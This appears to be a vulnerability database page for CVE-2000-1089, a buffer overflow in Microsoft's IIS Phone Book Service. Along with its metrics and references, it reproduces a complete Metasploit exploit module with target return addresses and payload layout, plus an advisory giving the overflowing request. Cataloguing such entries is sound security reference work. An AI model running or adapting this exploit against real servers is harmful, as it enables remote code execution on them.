CVE-2000-1089 : Detail

CVE-2000-1089

96.78%V3
Network
2001-01-22
04h00 +00:00
2005-11-02
09h00 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in Microsoft Phone Book Service allows local users to execute arbitrary commands, aka the "Phone Book Service Buffer Overflow" vulnerability.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 16357

Publication date : 2010-04-29 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: ms00_094_pbserver.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS Phone Book Service Overflow', 'Description' => %q{ This is an exploit for the Phone Book Service /pbserver/pbserver.dll described in MS00-094. By sending an overly long URL argument for phone book updates, it is possible to overwrite the stack. This module has only been tested against Windows 2000 SP1. }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2000-1089' ], [ 'OSVDB', '463' ], [ 'BID', '2048' ], [ 'MSB', 'MS00-094' ], ], 'Privileged' => false, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 896, 'BadChars' => "\x00\x0a\x0d\x20%&=?", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ ['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll ['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll ['Windows NT SP6', { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll ], 'DisclosureDate' => 'Dec 04 2000', 'DefaultTarget' => 0)) register_options( [ OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]), ], self.class) end def check print_status("Requesting the vulnerable ISAPI path...") res = send_request_raw({ 'uri' => datastore['URL'] }, 5) if (res and res.code == 400) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit print_status("Sending overflow...") res = send_request_raw({ 'uri' => datastore['URL'] + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912) }, 5) handler end end
Exploit Database EDB-ID : 20460

Publication date : 2000-12-03 23h00 +00:00
Author : Alberto Solino
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2048/info The Phone Book Service is an optional component that ships with the NT 4 Option Pack and Windows 2000. It is not installed by default. A buffer overflow vulnerability was discovered in the URL processing routines of the Phone Book Service requests on IIS 4 and IIS 5. If exploited, this vulnerability allows an attacker to execute arbitrary code and obtain a remote command shell with those privileges of the IUSR_machinename account (IIS 4) or the IWAM_machinename account (IIS 5). The Phone Book server services requests using the Internet Information Services 5.0 with URIs such as http://hostname/pbserver/ According to Microsoft's documentation a DLL (PBSERVER.DLL) is exported and the services can be used making requests with the following format: http://hostname/pbserver/pbserver.dll?osarch=&ostype=&osver=&cmver=&lcid=&pb ver=&pb=<STRING=db name> In the DLL checks the total lenght to ensure that request does not exceed 1024 bytes, however it is possible to overflow a local variable of fixed length in the DLL by sending a request with the following form: GET /pbserver/pbserver.dll?&&&&&&pb=AAAAAA... (less than 980 chars) HTTP/1.0\n\n The result is an exception reported in the Event log with source WAM like the following: The HTTP server encountered an unhandled exception while processing the ISAPI Application ' + 0x41414143 + 0x41414139 pbserver!HttpExtensionProc + 0x1C wam!DllGetClassObject + 0x808 RPCRT4!NdrServerInitialize + 0x4DB RPCRT4!NdrStubCall2 + 0x586 RPCRT4!CStdStubBuffer_Invoke + 0xC1 ole32!StgGetIFillLockBytesOnFile + 0x116EC ole32!StgGetIFillLockBytesOnFile + 0x12415 ole32!DcomChannelSetHResult + 0xDF0 ole32!DcomChannelSetHResult + 0xD35 ole32!StgGetIFillLockBytesOnFile + 0x122AD ole32!StgGetIFillLockBytesOnFile + 0x1210A ole32!StgGetIFillLockBytesOnFile + 0x11E22 RPCRT4!NdrServerInitialize + 0x745 RPCRT4!NdrServerInitialize + 0x652 RPCRT4!NdrServerInitialize + 0x578 RPCRT4!RpcSmDestroyClientContext + 0x9E RPCRT4!NdrConformantArrayFree + 0x8A5 RPCRT4!NdrConformantArrayFree + 0x3FC RPCRT4!RpcBindingSetOption + 0x395 RPCRT4!RpcBindingSetOption + 0x18E RPCRT4!RpcBindingSetOption + 0x4F8 KERNEL32!CreateFileA + 0x11B For additional information specific to this message please visit the Microsoft Online Support site located at: http://www.microsoft.com/contentredirect.asp. By sending a carefully crafted HTTP request an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL allowing the execution of arbitrary code as user GUEST on the vulnerable machine.

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_nt >> Version 4.0

References

http://www.securityfocus.com/bid/2048
Tags : vdb-entry, x_refsource_BID
http://www.stake.com/research/advisories/2000/a120400-1.txt
Tags : vendor-advisory, x_refsource_ATSTAKE